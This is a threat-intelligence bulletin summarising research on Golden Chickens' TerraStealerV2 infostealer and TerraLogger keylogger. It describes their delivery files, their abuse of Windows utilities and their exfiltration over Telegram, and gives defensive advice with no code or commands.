Summary:
Researchers at Recorded Future found two new types of malware made by a cybercriminal group called Golden Chickens. These hackers are known for selling malware to other criminals online. The new malware tools are called TerraStealerV2 and TerraLogger, and they were active between January and April 2025.

TerraStealerV2 is made to steal usernames, passwords, crypto wallet info, and browser data—mostly from Google Chrome. It gets into computers using files disguised as harmless things like shortcuts (LNK files), installers (MSI), or normal programs (EXE and DLL files). Once it runs, it uses trusted Windows tools like regsvr32.exe or mshta.exe to avoid getting caught by antivirus software. Then it sends the stolen information to the hackers using Telegram or a sketchy website called wetransfers[.]io. But one thing to note: it can't steal passwords from newer versions of Chrome that use a special type of protection called ABE, which means this malware might be a little outdated or still being worked on.

TerraLogger is a much simpler tool—it’s just a keylogger. That means it records everything someone types on their keyboard. It doesn’t send the info anywhere; it just saves it to a file on the infected computer. This tool also seems to still be in development, with small updates showing that the hackers are still testing how it works.

Golden Chickens has been around for years and is behind other malware that’s been used in attacks on big companies like British Airways and Ticketmaster. These new tools show they’re still very active and still trying to steal information and make money by selling access to other hackers.

If your organization hasn’t already, it’s a good idea to block sites like wetransfers[.]io, watch out for weird shortcut or installer files, and check for suspicious programs trying to run regsvr32.exe or use Telegram. These are signs that something shady might be going on.

In short:

• TerraStealerV2 steals browser info and crypto data, but struggles with newer Chrome protections.
• TerraLogger tracks what people type and saves it, but doesn’t send it anywhere (yet).
• Both tools are still being updated and could get more dangerous.
• They’re being used by a group known for selling tools to other hackers.

Security Officer Comments:
What's especially chilling is that this malware doesn't just siphon login information or track what you're typing—it disguises itself by using tools computers already trust, so it's hard for security software to catch. Worse, the gang behind it, Golden Chickens, sells these tools to other criminals, so it's not some single hacker who's using it—it could be hundreds. The fact that they’re still testing and improving it means we’ll probably see stronger versions soon. That’s why it’s so important to keep systems updated, be careful with strange files or links, and watch for anything that seems off.

Suggested Corrections:
To protect yourself and your computer from scary malware like TerraStealerV2 and TerraLogger, here are a few important things you should do:

• Keep your software updated — especially browsers like Chrome. The newer versions have extra protections that this malware can’t break (yet).
• Don’t open random files — especially shortcuts (.lnk), installers (.msi), or anything that seems off, even if it looks harmless.
• Use antivirus software and keep it updated. It’s not perfect, but it can help catch the obvious threats.
• Block unknown websites like wetransfers[.]io (where this malware sends stolen data).
• Watch for strange behavior — like weird files showing up in places like C:\\ProgramData\\ or programs running that you didn’t open (like regsvr32.exe or mshta.exe).
• Use strong, unique passwords and a password manager — just in case anything ever does get stolen.

Basically: stay alert, update everything, and don’t click random stuff. Hackers are getting smarter, but so can we.

Link(s):
https://www.recordedfuture.com/research/terrastealerv2-and-terralogger